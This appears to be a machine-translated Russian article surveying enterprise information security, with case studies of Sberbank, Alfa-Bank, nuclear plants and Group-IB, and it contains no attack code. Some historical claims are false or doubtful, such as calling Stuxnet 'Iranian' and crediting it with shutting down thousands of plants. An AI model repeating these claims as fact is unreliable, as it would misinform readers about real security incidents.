The information security system at the enterprise is organized in various ways, inviting outsourcing companies or studying someone else's successful experience. Examples of information security will show how exactly the problem is solved in various business sectors.
The main trends in the organization of information security at the enterprise
It is interesting to analyze a number of cases showing how the information security system was implemented in Russian banks and companies.
The problem is solved in one of two ways:
- on their own;
- with the involvement of contractors.
In Russia, there is a tendency to entice leading cybersecurity specialists from companies specializing in combating cyber threats to large Russian corporations in order to build their own information security model, avoiding the risks of data leakage expected when working with contractors. The Central Bank of the Russian Federation warns about the existence of such information security risks for banks by issuing a special standard on the rules for working with outsourcers; they will be relevant for the enterprise as well.
From the point of view of the choice of software tools for protecting information security, the state policy of supporting the national manufacturer encourages Russian corporations with state participation or actively working with government contracts to switch to Russian software. Small business prefers it for reasons of affordability, higher reliability, information security in narrow IP sectors.
The disadvantage of the import substitution policy is the lack of a unified Russian operating system. With over 20 existing products addressing tactical rather than strategic objectives, companies have to put up with vulnerabilities in Windows and Linux. The fact that they are well known to cyber fraudsters is evidenced by the epidemic of the WannaCry virus, a ransomware that stopped factories and hospitals around the world and caused damage estimated at tens of billions of dollars.
The Digital Economy project provides for the creation of a unified Russian national IoT OS by 2020, it is supposed to be used for the Internet of Things and the Industrial Internet, it should ensure the information security of ACS and smart homes, eliminate the risks of hackers entering the network and using home coffee machines as bots. As a result, “a domestic free operating system for use in all types of cyber-physical systems should enter the market, surpassing foreign operating systems in key performance parameters, security and fault tolerance”.
Building a threat model
The choice of an information security system depends on the level of risks. The threat model is often business driven. Thus, information leaks are typical for telecommunications companies, software developers, and medicine. For banks, it is more dangerous to attempt unauthorized transfers of funds from customer accounts. Databases of not only banks and mobile operators, but also educational institutions began to appear on the darknet.
New viruses are created with the participation of military structures. Since WannaCry saw the basic solutions provided to the hacker group by the US military. The Iranian Stuxnet, also targeting industrial plants and shutting down thousands of plants, was created by Israeli intelligence. It can be assumed that a medium-sized enterprise that uses general-user operating systems that do not provide a high degree of information security may at any moment become a victim of a new virus that affects individual countries or sectors of the economy. According to a survey of 200 CEOs of the world's largest enterprises, conducted by Ernst & Young, cyber threats will come out on top of information security threats to the global economy over the next five to ten years.
This indicates that when developing security systems, one should not rely entirely on the already implemented examples of information security of an enterprise; it is necessary at the basic stage to test all vulnerabilities and eliminate the alleged weaknesses. The main problem is the architecture of information systems, created at many enterprises of the Russian Federation in the 1970s and as the complexity of the software grows, it does not solve general security problems, but closes vulnerabilities with temporary and easily hacked solutions. Most IPs are weakly protected, and it is not difficult to infect them with malware or hack. When building your own security system, it is necessary to rely on the principle "the cost of hacking should be higher than the cost of theoretical benefits", market experts insist on it, promoting their solutions.
In 2019, 231 hacking campaigns were recorded targeting - companies and citizens. Malware and social engineering were the leaders among the attackers used, in 2018 there were 217 such campaigns, and they were mainly aimed at collecting passwords and credentials. But after most enterprises and cloud services switched to a two-factor authentication model that provides a high degree of information security, the direction of threats changed.
New solutions
In addition to the cases of introducing a general information security system, it is interesting to consider new technical solutions that can increase the degree of protection against leaks. There are software tools on the market for intercepting telephone conversations of employees.
This software module is built into the office IP telephony system and works according to the following principles:
- interception is subject to conversations using phone numbers previously entered into the database by the employer;
- interception is carried out on the basis of the presence of keywords; when they are detected, the audio information is completely converted into text and transmitted to the security service.
This solution allows you to expand the number of channels through which leaks are blocked. As an example of enterprise information security, it illustrates the heightened focus that companies place on employee communication with potential competitors, for example, to transfer a customer database.
Cases of implementation of system solutions for information security
Let's consider examples of information security of an enterprise from several sectors of the economy in order to understand how trends are reflected in the implementation of an information security system.
Sberbank and cyber security testing
Among Russian banks, Sberbank was the first to enter the cyberthreat market, creating a subsidiary company BI.Zone. Its tasks include testing the degree of protection against cyber threats for banks, telecom operators, and IT clients. One of the first companies to go through such testing was MGTS, a Moscow telephone operator that is part of the AFK-Sistema group of companies.
The company, which has become a newcomer to the information security market, offers services for testing communication channels, cybersecurity solutions and technical infrastructure. Load testing involves identifying potential vulnerabilities and undeclared capabilities in software from foreign and Russian manufacturers, which is not yet accepted on the Russian market.
According to the cybersecurity and digital forensics team at one of the world's largest consulting firms, KPMG, most major providers and carriers test their systems themselves. Sberbank's services can be attractive to small banks and companies as part of the overall package of services provided by them. The creation of this service has become one of the tools for researching the market for such services in general in order to determine the degree of their demand.
Alfa Bank
One of the largest Russian private banks in 2012-2013 created a fundamentally new information security system. Now it does not meet the requirements of the time and the recommendations of the regulator, but it is interesting as an example of the implementation of an information security system in an enterprise. Open sources show that the development of the system proceeded according to general principles, without the introduction of unique technologies. The implementation of the program was complicated by an extensive network of branches and points of sale, which creates a potential vulnerability in an attack on communication channels.
The audit also identified common pain points of systems with a branched architecture:
- most cases of information loss are associated with a malfunction and failure in the operation of software and hardware automation;
- A significant number of external attacks are based on well-known software and OS vulnerabilities.
An additional problem for the bank was the frequent visits of its employees to the websites of competitors, who, using software similar to the principle of working with CRM systems, can not only accurately track and predict the behavior of visitors, building their strategies, but also introduce malware.
To solve most of the information security tasks, Alfa-Bank used the following solutions:
- introduction of an advanced system for user authentication of the Alfa-Click instant payment system (utilities, telephony) based on technology promoted by A3. The complex includes means of authentication, authorization and administration. Authorization is applied when a user of a higher rank confirms a user's actions;
- encryption of all traffic when communicating with clients using the latest cryptographic information protection tools;
- the use of VPN protocols for data transmission;
- separation of network sectors in which various processes are launched by firewalls;
- Content filtering tools that help to reduce the level of data leaks from the network outside and penetration into the network through e-mail spam, phishing emails and messages containing attachments with viruses;
- tools for checking the integrity of disk contents;
- network vulnerability detection systems and network attack analyzers.
Cisco routers are used as the main hardware for information security protection.
The built-in firewall made it possible to implement:
- contextual access control (CBAC);
- Java-based locking;
- user actions log;
- detection and prevention of attacks;
- immediate notification of information security incidents.
In addition, the router supports virtual overlay networks, data tunnels, priority control system, resource reservation system, and combined routing control methods.
Kaspersky Open Space Security was used as a software anti-virus protection for local networks in 2012-2013, but it continues to be widely used in the banking sector to protect information security.
The solution allows:
- protect all types of network nodes;
- implement protection mechanisms against most types of external attacks.
The product is compatible with software solutions of most manufacturers and is loyal to the use of network resources. The applied information security protection tools made it possible to protect the network at a high level.
Implementation of the IS system on the example of NPP
Tasks different from those of the bank are solved by information security specialists who ensure information security of the NPP. The stations are managed by Rosenergoatom Concern.
The digital transformation of Rosenergoatom began in 2017 with two goals:
- Creation of a digital template of NPP operating experience. A unified management tool for NPP systems should allow solving the problems of process and risk management not only in Russian, but also in foreign projects of the concern, if their owners are ready to purchase an information product. The solution should be fully ready and integrated with SAP ERP installed at all 16 energy facilities by the end of 2021.
- Transition to a management model within the framework of the Russian intelligent energy system (IESD). It will help manage cybersecurity risks at all energy facilities in Russia - from nuclear power plants to hydroelectric power plants. The solution will be implemented on the basis of the IoT Energy platform being created within the framework of the Digital Economy project.
Work on building a unified cybersecurity system for nuclear power plants is being carried out within the framework of the Digital Economy project and based on the systemic decisions of the IAEA and Rosenergoatom. Until recently, the main requirement was the complete exclusion of connecting the NPP APCS to the Internet, but the implementation of the IECD project will make adjustments to this policy.
In 2015, more than ten significant cybersecurity incidents were recorded, mainly in the United States, related to outside penetration of the NPP network. They did not lead to accidents, only massive power outages, which caused significant damage. Taking into account such facts, it is required to maximally secure the communication channels of the NPP APCS from external connections.
From the point of view of studying examples of building an enterprise information security system, it is interesting how a model of information threats for nuclear power plants is being developed in different countries:
- in the United States, a program is used to calculate risks and their likelihood, installed at the facility itself;
- The Netherlands attracts external consultants with extensive experience in analytics and forecasting in the field of information security;
- some countries in Africa (Zimbabwe) use the Delphi method to identify threats to nuclear infrastructure.
Another feature of cybersecurity risk management at NPP enterprises is that modern software protection tools are considered insufficiently safe to be introduced into the NPP ICS software environment, therefore, the solution is to isolate it from external interference, build the strongest possible external protection system. But this does not remove the risks of insider incidents. For example, phishing emails sent to the e-mail boxes of NPP employees have become a common method of attacks. This problem in the field of information security is supposed to be solved by systematic training of personnel.
Building an information security model from Group-IB
Ilya Sachkov is a Russian cyber threat specialist and founder of Group-IB. The company is a member of the expert council for Internet security of the European Cybercrime Center, Europol's structural division for combating cybercrime. The specialist has created his own technology to combat DDoS attacks, and its successful practice makes it possible to pay attention to the key points of introducing an information security system.
The decision is based on three basic factors:
- prevention;
- development;
- investigation.
At the level of prevention, the tasks of building an up-to-date threat model are solved. At the investigation level, cyber forensics-level programs are used that are used to investigate computer crimes in law enforcement agencies. Even if the standard Windows tools did not cope with the task of prohibiting the erasure of information about tampering and you have to look for who and how stole data or infected the system with malware, the culprit of the incident is identified and evidence is collected to bring the offender to criminal liability.
So, there are interesting examples of investigating DDoS attacks:
- in the first case, it was directed to online publications. Analysis of the IP addresses from which the attack was carried out, it was possible to identify topics that affected someone's interests and find a customer;
- in the second, the attack on an advertising resource turned out to be related to its participation in a large tender, and competitors tried to exclude it from the list of contestants.
Based on the results of the investigation, it is possible to identify vulnerabilities and supplement or correct the threat model. But not everyone, even seeing the risk, is ready to take decisive measures to combat cyber threats.
General problems of building an information security system
If large banks and owners of critical information infrastructure facilities know well how to build their own information security model, then 40% of Russian companies do not understand the strategy in this matter, according to the world's largest auditing company PricewaterhouseCoopers (PwC).
The following problems were identified:
- almost 50% of Russian companies do not pay attention to training employees in the basics of information security;
- 56% of companies refuse to implement an incident response system due to its economic, in their opinion, inefficiency;
- only 19% of companies are confident that their software and hardware will help identify the perpetrator of the incident;
- 25% of companies believe that the main risk is borne by the mobile devices of employees, but are not ready to implement software solutions to neutralize the threat.
While company leaders are just beginning to think about the need to test vulnerabilities, the darknet is being replenished with offers for the sale of data that provide access to already hacked security systems.
Experts assume that the threat situation in 2020 will develop in the following areas:
- understanding the impossibility of building an ideal protection system will lead to the growth of the market for SIEM systems that allow you to quickly identify incidents and respond to them;
- the hunt for trained personnel will intensify, companies will invest more in the creation of joint training programs for cybersecurity specialists with universities;
- the role of unified state systems of incident management - FinCERT, GosSOPKA, IESD will increase;
- thanks to new forensic technologies, the identification of hacker groups that have been quietly controlling company networks for several years will begin;
- the role of operating systems that do not contain known vulnerabilities will increase;
- As the security of large companies grows, the number of attacks targeting their suppliers and contractors will increase.
Taking into account these aspects and already worked out examples of introducing an enterprise information security system, it is necessary to build a company's information security strategy for the coming years.
02/06/2020
16.12.2020
